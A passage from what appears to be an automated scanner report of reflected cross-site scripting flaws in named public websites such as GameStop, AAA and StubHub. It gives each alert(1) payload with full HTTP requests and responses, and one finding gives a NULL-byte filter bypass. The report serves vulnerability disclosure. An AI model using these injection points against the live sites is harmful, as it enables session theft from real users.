id%253A389669&mboxVersion=40 HTTP/1.1
Host: stubhub.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 143
Date: Tue, 19 Jul 2011 18:39:17 GMT
Server: Test & Target

mboxFactories.get('default').get('TicketDetails_Pricing17d1a<script>alert(1)</script>f9a0e7c0a1a',0).setOffer(new mboxOfferDefault()).loaded();

4.124. http://support.fastteks.com/contact-us.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://support.fastteks.com
Path:	/contact-us.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5afa"><script>alert(1)</script>c2243c61dfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5afa\"><script>alert(1)</script>c2243c61dfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-us.php?d5afa"><script>alert(1)</script>c2243c61dfa=1 HTTP/1.1
Host: support.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/Contact-Us.aspx?id=443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.2.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:01:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8j DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-
...[SNIP]...
<form name="frmContact" method="post" action="/contact-us.php?d5afa\"><script>alert(1)</script>c2243c61dfa=1" class="conform" onsubmit="return formCheck(this);">
...[SNIP]...

4.125. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tap-cdn.rubiconproject.com
Path:	/partner/scripts/rubicon/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload beb61*/alert(1)//5d56143d817 was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /partner/scripts/rubicon/page_parser.js?d=support.gamehouse.combeb61*/alert(1)//5d56143d817 HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; khaos=GOVBRMNC-I-DXQD; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Tue, 19 Jul 2011 20:26:09 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=3600
Expires: Tue, 19 Jul 2011 21:26:10 GMT
Date: Tue, 19 Jul 2011 20:26:10 GMT
Content-Length: 17453
Connection: close
Vary: Accept-Encoding

/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */

/*
The requested resource (/oz/scripts/domains/gamehouse.combeb61*/alert(1)//5d56143d817/page_parser_hooks.js) is not available
*/

function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

4.126. http://umfcluj.ro/contact.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/contact.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e92'-alert(1)-'6160d2b7976 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /contact.aspx?d1e92'-alert(1)-'6160d2b7976=1 HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:33:45 GMT
Content-Length: 60489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<script type="text/javascript" language="javascript">
document.getElementById("aspnetForm").action = '/contact.aspx?d1e92'-alert(1)-'6160d2b7976=1';
</script>
...[SNIP]...

4.127. http://waypointlivingspaces.com/locate-dealer [zip parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/locate-dealer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29054"><script>alert(1)</script>c4c490e0e79 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locate-dealer?zip=29054"><script>alert(1)</script>c4c490e0e79 HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:51:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:51:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<input type="text" name="zip" id="zip" title="Enter your zip code or city and state" value="29054"><script>alert(1)</script>c4c490e0e79" />
...[SNIP]...

4.128. http://waypointlivingspaces.com/locate-dealer [zip parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/locate-dealer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25749"><script>alert(1)</script>56a38b3928b was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /locate-dealer?zip=1001025749"><script>alert(1)</script>56a38b3928b HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:56:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:56:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<input type="text" name="zip" id="zip" title="Enter your zip code or city and state" value="1001025749"><script>alert(1)</script>56a38b3928b" />
...[SNIP]...

4.129. http://www.aaa.com/ [rurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aaa.com
Path:	/

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8ccb"><script>alert(1)</script>7b05fa45749 was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspxe8ccb"><script>alert(1)</script>7b05fa45749 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response (redirected)

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW3
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:00 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:00 GMT; path=/; domain=aaa.com
content-length: 1409

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspxe8ccb"><script>alert(1)</script>7b05fa45749?zip=05672&referer=www.aaa.com">
...[SNIP]...

4.130. http://www.aaa.com/ [rurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aaa.com
Path:	/

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b429'%3balert(1)//05cb045aa3 was submitted in the rurl parameter. This input was echoed as 8b429';alert(1)//05cb045aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx8b429'%3balert(1)//05cb045aa3 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response (redirected)

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW3
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:08 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:08 GMT; path=/; domain=aaa.com
content-length: 1361

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx8b429';alert(1)//05cb045aa3?zip=05672&
...[SNIP]...

...[SNIP]...

4.131. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aaa.com
Path:	/scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 881bf'%3balert(1)//43f8c51a252 was submitted in the rurl parameter. This input was echoed as 881bf';alert(1)//43f8c51a252 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx881bf'%3balert(1)//43f8c51a252 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:05 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:05 GMT; path=/; domain=aaa.com
content-length: 1364

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx881bf';alert(1)//43f8c51a252?zip=05672
...[SNIP]...

...[SNIP]...

4.132. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aaa.com
Path:	/scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9d1"><script>alert(1)</script>99de8810c92 was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx4d9d1"><script>alert(1)</script>99de8810c92 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:02 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:02 GMT; path=/; domain=aaa.com
content-length: 1409

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx4d9d1"><script>alert(1)</script>99de8810c92?zip=05672&referer=www.aaa.com">
...[SNIP]...

4.133. http://www.gamestop.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b620'><script>alert(1)</script>14a508ceae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2b620'><script>alert(1)</script>14a508ceae=1 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:32 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:32 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,4265,4287,3852,4300,4151,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Default.aspx?2b620'><script>alert(1)</script>14a508ceae=1' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.134. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gamestop.com
Path:	/JavaScript/CertonaTable.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c2e'%20a%3db%2058959062e85 was submitted in the REST URL parameter 1. This input was echoed as c4c2e' a=b 58959062e85 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JavaScriptc4c2e'%20a%3db%2058959062e85/CertonaTable.htm HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117799
Date: Tue, 19 Jul 2011 16:02:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:35 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/JavaScriptc4c2e' a=b 58959062e85/CertonaTable.htm' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.135. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gamestop.com
Path:	/JavaScript/CertonaTable.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 757bf'%20a%3db%2029f44a6dade was submitted in the REST URL parameter 2. This input was echoed as 757bf' a=b 29f44a6dade in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JavaScript/CertonaTable.htm757bf'%20a%3db%2029f44a6dade HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
